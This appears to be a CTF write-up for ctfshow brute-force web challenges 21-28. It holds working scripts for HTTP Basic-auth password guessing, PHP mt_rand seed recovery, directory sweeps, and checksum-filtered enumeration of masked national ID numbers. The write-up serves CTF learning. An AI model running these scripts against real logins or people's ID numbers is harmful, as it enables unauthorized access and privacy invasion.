[8 easy brute-force practice problems] CTFshow web20-28

This article was last updated on 22 August 2021 at 19:57.

Web21

Brute-forcing and the like, all basic moves.

Opening the challenge shows a login box straight away.

Capture a request first. The captured request is:

GET / HTTP/1.1
Host: b81055e7-b4c4-4fa1-a996-7d3bdfd7db8e.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Authorization: Basic YWRtaW46YWRtaW4=

Base64-decoding the Authorization value shows that it is just the username and password entered a moment ago:

YWRtaW46YWRtaW4=
admin:admin

The challenge also provides a file for download (renamed to zip.zip here); it is the password dictionary to brute-force with.

The Burp Intruder request, with the payload position marked by §…§:

GET / HTTP/1.1
Host: b81055e7-b4c4-4fa1-a996-7d3bdfd7db8e.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Authorization: Basic YWRtaW46§YWRtaW4=§

Intruder settings:

  • Payload Processing: add a Base64-encode rule, so each dictionary entry is encoded before it is inserted into the header.

  • Payload Encoding: remove = from the set of URL-encoded characters (otherwise the = padding that Base64 may produce is turned into %3D and the header becomes invalid).

Running the attack, exactly one response differs from the rest; that payload is the correct password.

Without Burp, the same thing can be done in Python:

import base64
import requests

url = "http://b81055e7-b4c4-4fa1-a996-7d3bdfd7db8e.challenge.ctf.show:8080"

# one candidate password per line in the downloaded dictionary
with open("dict.txt", "r") as f:
    passwords = f.read().splitlines()

for pw in passwords:
    # "admin:" is 6 bytes, so its Base64 form YWRtaW46 has no padding and the
    # encoded password can simply be appended to it
    headers = {
        "Authorization": "Basic YWRtaW46{}".format(base64.b64encode(pw.encode()).decode())
    }
    res = requests.get(url, headers=headers)
    if "ctfshow" in res.text:
        print(pw)
        print(res.text)
        break


Official hint:

Topic: Tomcat authentication brute force using Burp's custom iterator. https://www.cnblogs.com/007NBqaq/p/13220297.html Download the password dictionary, capture the request and brute-force it with Burp Suite.

Payload set -> custom iterator

Base64 encoding is needed; configure it under payload processing.

Untick Payload Encoding, because the Base64 encoding may end in == and URL-encoding would affect the Base64 result.

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-11-20 19:16:49
# @Last Modified by: h1xa
# @Last Modified time: 2020-11-20 20:28:42
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

import time
import requests
import base64

url = 'http://41a801fe-a420-47bc-8593-65c3f26b7efa.chall.ctf.show/index.php'

password = []

with open("1.txt", "r") as f:
    while True:
        data = f.readline()
        if data:
            password.append(data)
        else:
            break


for p in password:
    strs = 'admin:' + p[:-1]
    header = {
        'Authorization': 'Basic {}'.format(base64.b64encode(strs.encode('utf-8')).decode('utf-8'))
    }
    rep = requests.get(url, headers=header)
    time.sleep(0.2)
    if rep.status_code == 200:
        print(rep.text)
        break

Web22

Domains can be brute-forced too; try brute-forcing the subdomains of ctf.show.

An online subdomain lookup (phpinfo.me) does the enumeration.

The flag is on the subdomain vip.ctf.show.

Official hint (not useful here):

http://flag.ctfer.com/index.php

Web23

More brute-forcing? With this much code? I'm out.

Opening the challenge shows the source:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-03 11:43:51
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-03 11:56:11
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
error_reporting(0);

include('flag.php');
if(isset($_GET['token'])){
    $token = md5($_GET['token']);
    if(substr($token, 1,1)===substr($token, 14,1) && substr($token, 14,1) ===substr($token, 17,1)){
        if((intval(substr($token, 1,1))+intval(substr($token, 14,1))+substr($token, 17,1))/substr($token, 1,1)===intval(substr($token, 31,1))){
            echo $flag;
        }
    }
}else{
    highlight_file(__FILE__);

}
?>

A brute-force script over small integers, applying the same two checks:

<?php
for($i = 0 ; $i <= 10000 ; $i ++)
{
    $token = md5($i);
    if(substr($token, 1,1)===substr($token, 14,1) && substr($token, 14,1) ===substr($token, 17,1)){
        if((intval(substr($token, 1,1))+intval(substr($token, 14,1))+substr($token, 17,1))/substr($token, 1,1)===intval(substr($token, 31,1))){
            echo $i;
        }
    }
}
?>

The output is printed as 4221202: because echo adds no separator, that is two hits run together, 422 and 1202. Either one works; pass it as the parameter:

?token=1202

Official hint:

Looking at the source, we need to GET a token that satisfies the conditions and the flag is printed.

#coding: utf-8
#啊韬
import hashlib
dic = '0123456789qazwsxedcrfvtgbyhnujmikolp'
for a in dic:
    for b in dic:
        t = str(a)+str(b)
        md5 = hashlib.md5(t.encode()).hexdigest()
        #print(md5)
        #print(md5[1:2])
        #print(md5[14:15])
        #print(md5[17:18])
        # only the first condition (three equal characters) is tested here;
        # a printed candidate still has to pass the division check on the server
        if md5[1:2] == md5[14:15] and md5[14:15]== md5[17:18]:
            print(t)
            print(md5)
            print(md5[1:2])
            print(md5[14:15])
            print(md5[17:18])

Pass ?token=3j
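The same search done in Python, as an added example (neither the post's PHP nor the official hint's script), with the PHP semantics the second check relies on spelled out: under PHP 7 only a decimal digit 1-9 at offsets 1, 14 and 17 can pass, and then offset 31 must be '3'. php_token_ok() mirrors the server-side checks and find_tokens() reproduces the integer sweep of the PHP script above; the function names are mine.

```python
import hashlib


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def php_token_ok(token: str) -> bool:
    """Mirror the two checks of the challenge's PHP source under PHP 7 rules."""
    h = md5_hex(token)
    c = h[1]
    # check 1: the hex characters at offsets 1, 14 and 17 are identical
    if not (c == h[14] == h[17]):
        return False
    # check 2: (intval(c) + intval(c) + c) / c === intval(h[31])
    # A hex letter has intval() 0 and counts as a non-numeric string in
    # arithmetic (treated as 0, with a warning), and '0' divides by zero; in
    # both cases PHP 7's '/' yields a float (INF or NAN), and a float is never
    # === an int.  For a digit k the left side is (k + k + k) / k == 3, which
    # divides exactly, so PHP returns int 3.
    if not ("1" <= c <= "9"):
        return False
    # int 3 === intval(h[31]) only for the character '3'
    return h[31] == "3"


def find_tokens(limit: int = 10000) -> list:
    """Decimal tokens in [0, limit] that pass both checks, in ascending order."""
    return [i for i in range(limit + 1) if php_token_ok(str(i))]


if __name__ == "__main__":
    print(find_tokens())
```

Because the checks reduce to "one digit repeated at three offsets plus a fixed digit at a fourth", roughly one token in 7000 passes, which is why a sweep of a few thousand integers is enough.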

Web24

Brute-force, my 🔨.

Opening the challenge shows:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-03 13:26:39
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-03 13:53:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
include("flag.php");
if(isset($_GET['r'])){
    $r = $_GET['r'];
    mt_srand(372619038);
    if(intval($r)===intval(mt_rand())){
        echo $flag;
    }
}else{
    highlight_file(__FILE__);
    echo system('cat /proc/version');
}

?>

mt_srand() seeds PHP's random number generator. Normally no seed is set explicitly (PHP seeds it automatically), but once a fixed seed is set, the sequence mt_rand() produces is fixed as well, so the value can simply be reproduced locally.

Note: use PHP 7.1 or later. PHP 7.1 switched mt_rand() to the correct Mersenne Twister implementation, so older versions produce a different number for the same seed.

<?php
mt_srand(372619038);
echo intval(mt_rand());
?>

The output is 1155388967; pass it as the parameter to get the flag:

?r=1155388967

Official hint:

Reference: PHP pseudo-random numbers. mt_srand(seed) seeds the Mersenne Twister random number generator; seed is optional and specifies the seed value.

mt_srand(seed) means handing out a seed; once the seed is there, mt_rand() generates the random numbers from it. Note: as of PHP 4.2.0 the random number generator is seeded automatically, so calling this function is not necessary. So no seeding is needed, and if the seed parameter is set, the random numbers generated are pseudo-random, meaning the same numbers are generated every time.

Web25

Brute-force, my 🔨. No more brute-forcing.

Opening the challenge shows:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-03 13:56:57
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-03 15:47:33
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


error_reporting(0);
include("flag.php");
if(isset($_GET['r'])){
    $r = $_GET['r'];
    mt_srand(hexdec(substr(md5($flag), 0,8)));
    $rand = intval($r)-intval(mt_rand());
    if((!$rand)){
        if($_COOKIE['token']==(mt_rand()+mt_rand())){
            echo $flag;
        }
    }else{
        echo $rand;
    }
}else{
    highlight_file(__FILE__);
    echo system('cat /proc/version');
}

Reading the program: send ?r=0 first. Then $rand = intval(0) - mt_rand() is non-zero, so the else branch echoes it, and the response leaks the first mt_rand() value (as a negative number).

Here the first mt_rand() value is 1245795688.

Feed that value to the php_mt_seed tool to brute-force the original seed.

php_mt_seed reports two candidate seeds: 1439760354 and 2280212934.

The two mt_rand() calls in the token check are not the same as the earlier one: they are the second and third numbers of the sequence, whereas the one used for $rand was the first.

if($_COOKIE['token']==(mt_rand()+mt_rand())){
    echo $flag;
}

So run the sequence locally and get the second and third values:

<?php
mt_srand(1439760354);
echo mt_rand()."\n";
echo mt_rand()."\n";
echo mt_rand();
?>

Output:

1245795688
394229461
741102128

So the token to send would be 394229461 + 741102128 = 1135331589.

But 1439760354 turns out not to be the right seed, so try the other candidate, 2280212934:

<?php
mt_srand(2280212934);
echo mt_rand()."\n";
echo mt_rand()+mt_rand();
?>

Output (the first value matches again; the second line is the sum of the second and third values):

1245795688
2872552815

The final request, with r set to the first value and the token cookie set to that sum:
GET /?r=1245795688 HTTP/1.1
Host: 13b2a136-4658-48ed-8a26-2cd6c59a9ef9.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh
Accept-Encoding: gzip, deflate
Connection: close
Cookie: token=2872552815
Upgrade-Insecure-Requests: 1
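
Reproducing mt_rand() without a PHP installation, as an added example that is not part of the original post or of ctfshow's hints: PHP 7.1 and later seed a standard MT19937 state from the 32-bit seed exactly as the reference init_genrand() does, and mt_rand() without arguments returns the tempered 32-bit output shifted right by one bit. The class below implements that, so it produces the Web24 value for seed 372619038 and, for the Web25 candidate seeds, the first value (to compare with the leaked $rand) and the second plus third value (the token cookie). The class and function names are mine; the seeds and expected values are the ones quoted in this post. Seed recovery itself (a 2^32 search) is left to php_mt_seed, which is what the post uses.

```python
N, M = 624, 397
MATRIX_A = 0x9908B0DF
UPPER_MASK, LOWER_MASK = 0x80000000, 0x7FFFFFFF
MASK32 = 0xFFFFFFFF


class PhpMtRand:
    """MT19937 as PHP >= 7.1 uses it: mt_srand(seed) initialises the state
    exactly like the reference init_genrand(), and mt_rand() with no
    arguments returns the tempered 32-bit word shifted right by one."""

    def __init__(self, seed: int):
        self.mt = [0] * N
        self.mt[0] = seed & MASK32
        for i in range(1, N):
            prev = self.mt[i - 1]
            self.mt[i] = (1812433253 * (prev ^ (prev >> 30)) + i) & MASK32
        self.index = N  # PHP reloads (twists) the state right after seeding

    def _reload(self) -> None:
        mt = self.mt
        for i in range(N):
            y = (mt[i] & UPPER_MASK) | (mt[(i + 1) % N] & LOWER_MASK)
            v = mt[(i + M) % N] ^ (y >> 1)
            if y & 1:
                v ^= MATRIX_A
            mt[i] = v
        self.index = 0

    def raw32(self) -> int:
        """php_mt_rand(): one tempered 32-bit output."""
        if self.index >= N:
            self._reload()
        y = self.mt[self.index]
        self.index += 1
        y ^= y >> 11
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        y ^= y >> 18
        return y & MASK32

    def mt_rand(self) -> int:
        """PHP mt_rand() without arguments: a 31-bit value."""
        return self.raw32() >> 1


def mt_rand_sequence(seed: int, count: int) -> list:
    """The first `count` values mt_rand() returns after mt_srand(seed)."""
    rng = PhpMtRand(seed)
    return [rng.mt_rand() for _ in range(count)]


def web25_values(seed: int) -> tuple:
    """(first mt_rand(), second + third) for a candidate seed: the first must
    equal the value the server leaked via ?r=0, the sum is the token cookie."""
    first, second, third = mt_rand_sequence(seed, 3)
    return first, second + third


if __name__ == "__main__":
    print(mt_rand_sequence(372619038, 1))   # Web24
    for seed in (1439760354, 2280212934):   # Web25 candidates from php_mt_seed
        print(seed, web25_values(seed))
```

When php_mt_seed returns several seeds, each of them reproduces the leaked first value by construction, so only the server can tell which one is the real seed; checking the candidates in turn, as the post does, is the only option.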


Official hint:

https://www.openwall.com/php_mt_seed/ https://www.cnblogs.com/zaqzzz/p/9997855.html

mt_srand(seed) means handing out a seed; once the seed is there, mt_rand() generates the random numbers from it. I had assumed the cookie would need to be brute-forced, but in the end some masters pointed me to a script made specifically for recovering mt_srand() seeds from mt_rand() numbers.

Let me explain why mt_rand()+mt_rand() is not the first random number added to itself: each generated number is a deterministic linear transformation (actually a very complex one) of the state, and every output is different, so you cannot take the first one times two to get mt_rand()+mt_rand(). In other words, once we have the seed we can compute the values we want locally.

Solution: find the seed from the random number. Send ?r=0 to get the random number; I got 183607393, and it differs every time (because the flag changes). Then download php_mt_seed 4.0 and compile it under Linux with gcc: gcc php_mt_seed.c -o php_mt_seed. Then run the tool with the random number: ./php_mt_seed 183607393

Find the matching version. I was lucky here: the first seed that came out was the right one when I checked it. Note: there may be several seeds, and you have to check them yourself. The first random number derived from the seed is the number above.

payload: ?r=183607393 Cookie: token=794171094

Web26

This one can be brute-forced.

Opening the challenge lands on an installation page.

On the surface it is an installer, but the database-connection check behind it is what gets brute-forced: the password field.

The request with the payload position marked:

POST /checkdb.php HTTP/1.1
Host: 27ec50e4-ab0d-4ad8-bdeb-7a73543db810.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 43
Origin: http://27ec50e4-ab0d-4ad8-bdeb-7a73543db810.challenge.ctf.show:8080
Connection: close
Referer: http://27ec50e4-ab0d-4ad8-bdeb-7a73543db810.challenge.ctf.show:8080/install.php

a=localhost&p=3306&d=ctf&u=root&pass=§123456§

This yields the flag.

Official hint:

Capture the request with the Chrome browser and brute-force the password.

Web27

CTFshow Rookie Academy is now admitting students!

Opening the challenge shows the academy's page.

Download the admission list: it gives the admitted students' names together with their ID numbers, the eight birth-date digits masked with asterisks (for example 360730********7653).

The student record query system takes a name and the full ID number.

Same as before, brute-force it with Burp; the request with the masked digits as the payload position:
POST /info/checkdb.php HTTP/1.1
Host: 939ee7e2-018f-414c-a4a2-357837724391.challenge.ctf.show:8080
Content-Length: 50
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://939ee7e2-018f-414c-a4a2-357837724391.challenge.ctf.show:8080
Referer: http://939ee7e2-018f-414c-a4a2-357837724391.challenge.ctf.show:8080/info/query.php?
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

a=%E5%B5%87%E5%BC%80%E6%A2%A6&p=360730§********§7653

In Intruder, the payload for the masked position is a list of YYYYMMDD birth dates over a plausible range of years. Exactly one response differs from the rest; its body is:
\u606d\u559c\u60a8\uff0c\u60a8\u5df2\u88ab\u6211\u6821\u5f55\u53d6\uff0c\u4f60\u7684\u5b66\u53f7\u4e3a10167653\u521d\u59cb\u5bc6\u7801\u4e3a\u8eab\u4efd\u8bc1\u53f7\u7801

Decoded (from Chinese):

Congratulations, you have been admitted to our school. Your student number is 10167653 and your initial password is your ID number.

Logging in with student number 10167653 and password 360730199110167653 gives the flag.

Official hint (a script that writes candidate ID numbers for the masked number 621022********5237 to zid.txt):

<?php
//621022********5237
$myfile = fopen("zid.txt", "w") or die("Unable to open file!");
for($year=1990;$year<1993;$year++){
    for($mon=1;$mon<10;$mon++){
        for($day=01;$day<10;$day++)
        {
            $txt=('621022'.$year.'0'.$mon.'0'.$day.'5237')."\n";
            fwrite($myfile, $txt);
        }
    }
}
for($year=1990;$year<1993;$year++){
    for($mon=1;$mon<10;$mon++){
        for($day=10;$day<=31;$day++)
        {
            $txt=('621022'.$year."0".$mon.$day.'5237')."\n";
            fwrite($myfile, $txt);
        }
    }
}
for($year=1990;$year<1993;$year++){
    for($mon=10;$mon<=12;$mon++)
    {
        for($day=10;$day<=31;$day++)
        {
            $txt=('621022'.$year.$mon.$day.'5237')."\n";
            fwrite($myfile, $txt);
        }
    }
}
for($year=1990;$year<1993;$year++){
    for($mon=10;$mon<=12;$mon++){
        for($day=01;$day<10;$day++)
        {
            $txt=('621022'.$year.$mon."0".$day.'5237')."\n";
            fwrite($myfile, $txt);
        }
    }
}
fclose($myfile);
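Generating the candidate ID numbers more carefully, as an added example that is neither the post's Burp setup nor the hint's script and goes one step beyond both: resident ID numbers carry a check character (ISO 7064 MOD 11-2 over the first 17 digits), and the masked number keeps that character visible, so only about one birth date in eleven is even consistent with it. The code enumerates real calendar dates for a chosen range of birth years and keeps only the candidates whose check character matches, shrinking the wordlist roughly elevenfold before a single request is sent. The function names and the 1990-1992 year range are my choices; the masked number and the recovered 360730199110167653 are from the post.

```python
import calendar

# GB 11643-1999 resident ID number: 6-digit region code, 8-digit birth date
# (YYYYMMDD), 3-digit sequence number and a check character computed over the
# first 17 digits with ISO 7064 MOD 11-2.
WEIGHTS = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2]
CHECK_CHARS = "10X98765432"  # indexed by (weighted sum mod 11)


def id_check_char(first17: str) -> str:
    total = sum(int(d) * w for d, w in zip(first17, WEIGHTS))
    return CHECK_CHARS[total % 11]


def is_valid_id(idnum: str) -> bool:
    return (len(idnum) == 18 and idnum[:17].isdigit()
            and id_check_char(idnum[:17]) == idnum[17].upper())


def candidate_ids(masked: str, years) -> list:
    """Expand a masked number such as '360730********7653' over every real
    calendar date in `years`, keeping only candidates whose check character
    agrees with the visible last digit."""
    prefix, suffix = masked.split("********")
    if len(prefix) != 6 or len(suffix) != 4:
        raise ValueError("expected 6 visible digits, 8 masked, 4 visible")
    out = []
    for year in years:
        for month in range(1, 13):
            days = calendar.monthrange(year, month)[1]
            for day in range(1, days + 1):
                idnum = f"{prefix}{year:04d}{month:02d}{day:02d}{suffix}"
                if is_valid_id(idnum):
                    out.append(idnum)
    return out


def date_count(years) -> int:
    """Size of the naive date wordlist, for comparison."""
    return sum(calendar.monthrange(y, m)[1] for y in years for m in range(1, 13))


if __name__ == "__main__":
    years = range(1990, 1993)
    cands = candidate_ids("360730********7653", years)
    print(date_count(years), "dates ->", len(cands), "checksum-consistent candidates")
    for c in cands:
        print(c)
```

The resulting list can be fed to Intruder as a simple list payload covering the whole 18-digit field, or sent directly by a script; either way the server sees about a tenth of the requests the naive date sweep would cost.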

Web28

Needle in a haystack.

Opening the challenge, the URL has the form /<dir>/<dir>/2.txt. Entering an arbitrary file name such as 3.txt leads to too many redirects, and the browser refuses to render the page.

Try brute-forcing the two directory levels instead. The request, with both payload positions marked:
GET /§0§/§1§/ HTTP/1.1
Host: b98a712c-e342-4258-b1fb-75d5d4c709de.challenge.ctf.show:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


Intruder settings: attack type Cluster bomb, with a numeric payload from 0 to 100 for each of the two positions, so all 101 x 101 combinations are tried.

Once the run finishes, one response contains the flag.

Official hint:

Brute-force the directories /0-100/0-100/ and inspect the returned responses.

Drop 2.txt when brute-forcing; brute-forcing just the directories is enough.
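The same directory sweep in Python, as an added example that is not part of the post: candidate_paths() builds the 101 x 101 /i/j/ combinations the hint describes, brute_force() fetches them concurrently and classifies each response with is_hit(). Because the post saw a redirect loop for wrong paths, the HTTP fetcher disables redirect following and treats only a direct 200 response containing "ctfshow" as a hit; that classification rule, the flag marker and the offline fake_fetch() stand-in (with /72/20/ as the pretend flag directory) are assumptions made for illustration, as are the function names.

```python
from concurrent.futures import ThreadPoolExecutor
from itertools import product


def candidate_paths(lo: int = 0, hi: int = 100) -> list:
    """Every /i/j/ directory pair with i, j in [lo, hi], as the hint describes."""
    return [f"/{i}/{j}/" for i, j in product(range(lo, hi + 1), repeat=2)]


def is_hit(status: int, body: str) -> bool:
    # Wrong paths send the browser into a redirect loop, so redirects are not
    # followed and only a direct 200 carrying the flag marker counts as a hit.
    return status == 200 and "ctfshow" in body


def brute_force(fetch, paths, workers: int = 20) -> list:
    """fetch(path) -> (status, body).  Returns the paths classified as hits."""
    hits = []
    with ThreadPoolExecutor(max_workers=workers) as pool:
        # pool.map keeps the input order, so paths and results line up
        for path, (status, body) in zip(paths, pool.map(fetch, paths)):
            if is_hit(status, body):
                hits.append(path)
    return hits


def http_fetch(base_url: str):
    """Real fetcher for the challenge host; redirects are deliberately not followed."""
    import requests  # imported lazily so the offline demo below needs nothing extra

    def fetch(path):
        r = requests.get(base_url + path, allow_redirects=False, timeout=5)
        return r.status_code, r.text
    return fetch


def fake_fetch(path: str):
    """Constructed stand-in for the server: /72/20/ is the pretend flag directory,
    every other directory answers with a redirect, as the post observed."""
    if path == "/72/20/":
        return 200, "ctfshow{this-is-a-constructed-example-flag}"
    return 302, ""


if __name__ == "__main__":
    print(brute_force(fake_fetch, candidate_paths()))
    # against the real target:
    # brute_force(http_fetch("http://<host>:8080"), candidate_paths())
```

Keeping the fetcher separate from the classification makes the sweep testable offline and lets the same loop be pointed at a different host or a different hit rule (for example a body length that stands out) without touching the enumeration.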